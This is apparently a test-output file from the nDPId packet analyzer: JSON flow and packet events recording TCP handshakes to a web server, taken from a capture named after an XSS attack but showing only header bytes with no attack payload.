-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347426122,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347426122,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vtlAAD4GBvesEAABwKgKMt7mAFDtahlHAAAAAKACchDQQgAAAgQFtAQCCAoBOqeeAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3821,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347426122,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ub5Z5wJ7WoZSKAScSC+twAAAgQFtAQCCAoD5HkUATqnngEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3822,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vtpAAD4GBv6sEAABwKgKMt7mAFDtahlI+WecCoAQAOVdvwAAAQEICgE6p54D5HkU"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347427366,"flow_last_seen":1499347427366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347427366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1499347427366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347427366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UGVAAD4GdWusEAABwKgKMt70AFC9kfiwAAAAAKACchAfbQAAAgQFtAQCCAoBOqjVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":1499347427366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347427366,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3vS8sHHovZH4saAScSBzgwAAAgQFtAQCCAoD5HpLATqo1QEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3834,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1499347427367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347427367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UGZAAD4GdXKsEAABwKgKMt70AFC9kfixvLBx6YAQAOUSiwAAAQEICgE6qNUD5HpL"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347428671,"flow_last_seen":1499347428671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347428671,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1499347428671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347428671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vFFAAD4GCX+sEAABwKgKMt8CAFCqwBZKAAAAAKACchATUQAAAgQFtAQCCAoBOqobAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1499347428671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347428671,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3wITPWXXqsAWS6AScSAbpgAAAgQFtAQCCAoD5HuRATqqGwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3846,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1499347428672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347428672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vFJAAD4GCYasEAABwKgKMt8CAFCqwBZLEz1l2IAQAOW6rQAAAQEICgE6qhsD5HuR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3862,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347431192,"flow_last_seen":1499347431192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347431192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3862,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1499347431192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347431192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+sNAAD4GywysEAABwKgKMt8cAFA\/1VZRAAAAAKACchA7pAAAAgQFtAQCCAoBOqySAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":1499347431192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347431192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3xwMzQFkP9VWUqAScSCsZgAAAgQFtAQCCAoD5H4HATqskgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":1499347431193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347431193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+sRAAD4GyxOsEAABwKgKMt8cAFA\/1VZSDM0BZYAQAOVLbgAAAQEICgE6rJID5H4H"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347432482,"flow_last_seen":1499347432482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347432482,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1499347432482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347432482,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rn5AAD4GF1KsEAABwKgKMt8qAFCuFwOqAAAAAKACchAeuQAAAgQFtAQCCAoBOq3UAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":1499347432482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347432482,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ypOGaUvrhcDq6AScSCpIAAAAgQFtAQCCAoD5H9KATqt1AEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":1499347432482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347432482,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rn9AAD4GF1msEAABwKgKMt8qAFCuFwOrThmlMIAQAOVIKAAAAQEICgE6rdQD5H9K"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347433753,"flow_last_seen":1499347433753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347433753,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1499347433753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347433753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JW1AAD4GoGOsEAABwKgKMt84AFAetop\/AAAAAKACchAl+QAAAgQFtAQCCAoBOq8SAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3890,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":1499347433753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347433753,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3zgqPCDhHraKgKAScSBXTwAAAgQFtAQCCAoD5ICHATqvEgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":1499347433754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347433754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JW5AAD4GoGqsEAABwKgKMt84AFAetoqAKjwg4oAQAOX2VgAAAQEICgE6rxID5ICH"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347436274,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347436274,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W69AAD4GaiGsEAABwKgKMt9SAFA\/BeonAAAAAKACchCjcQAAAgQFtAQCCAoBOrGIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347436274,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ31ICI0S7PwXqKKAScSDWjwAAAgQFtAQCCAoD5IL+ATqxiAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3907,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W7BAAD4GaiisEAABwKgKMt9SAFA\/BeooAiNEvIAQAOV1lwAAAQEICgE6sYgD5IL+"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347437541,"flow_last_seen":1499347437541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347437541,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1499347437541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347437541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80SpAAD4G9KWsEAABwKgKMt9gAFCd2mPvAAAAAKACchDJiQAAAgQFtAQCCAoBOrLFAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":1499347437541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347437541,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ32BqH6Tbndpj8KAScSAzTwAAAgQFtAQCCAoD5IQ6ATqyxQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3918,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":1499347437542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347437542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00StAAD4G9KysEAABwKgKMt9gAFCd2mPwah+k3IAQAOXSVgAAAQEICgE6ssUD5IQ6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347440119,"flow_last_seen":1499347440119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347440119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1499347440119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347440119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Op5AAD4GizKsEAABwKgKMt96AFDbdo\/XAAAAAKACchBdZwAAAgQFtAQCCAoBOrVJAAAAAAEDAwc="} 
